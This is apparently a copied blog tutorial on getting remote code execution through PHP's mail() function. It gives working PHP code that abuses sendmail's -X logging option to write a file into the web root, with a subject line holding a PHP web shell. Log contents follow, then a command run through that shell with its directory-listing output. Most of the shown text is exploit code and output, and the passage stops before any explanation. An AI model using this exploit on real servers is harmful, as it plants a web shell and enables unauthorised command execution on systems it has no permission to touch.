php mail function php injection

http://webcache.googleusercontent.com/search?q=cache:nkjOOvPZjPcJ:securitysucks.info/exploit-phps-mail-to-get-remote-code-execution/+&cd=1&hl=en&ct=clnk&gl=us

With that said, let’s just dive into it!

This is the code for exploiting the mail() function

1 2 3 4 5 6

$to = 'a@b.c'; $subject = '<?php system($_GET["cmd"]); ?>'; $message = ''; $headers = ''; $options = '-OQueueDirectory=/tmp -X/var/www/html/rce.php'; mail($to, $subject, $message, $headers, $options);

Let’s inspect the logs from this. First let’s have a look at what we can see in the browser by only going to the rce.php file

1 2 3

11226 <<< To: a@b.c 11226 <<< Subject: 11226 <<< X-PHP-Originating-Script: 1000:mailexploit.php 11226 <<<

Nothing really scary to see in this log. Now, let’s use the catcommand in the terminal on the same file

1 2 3 4 5

> cat rce.php 11226 <<< To: a@b.c 11226 <<< Subject: <?php system($_GET["cmd"]); ?> 11226 <<< X-PHP-Originating-Script: 1000:mailexploit.php 11226 <<<

See anything a bit more interesting? Let’s try to execute some commands.

I visit http://localhost/rce.php?cmd=ls%20-la and get the following output

1 2 3 4 5 6 7 8 9 10 11 12

11226 <<< To: a@b.c 11226 <<< Subject: total 20 drwxrwxrwx 2 *** *** 4096 Sep 3 01:25 . drwxr-xr-x 4 *** www-data 4096 Sep 2 23:53 .. -rw-r--r-- 1 *** *** 92 Sep 3 01:12 config.php -rwxrwxrwx 1 *** *** 206 Sep 3 01:25 mailexploit.php -rw-r--r-- 1 www-data www-data 176 Sep 3 01:27 rce.php 11226 <<< X-PHP-Originating-Script: 1000:mailexploit.php 11226 <<< 11226 <<< 11226 <<< 11226 <<< [EOF]

Now, let me break it down in case you don’t fully understand the code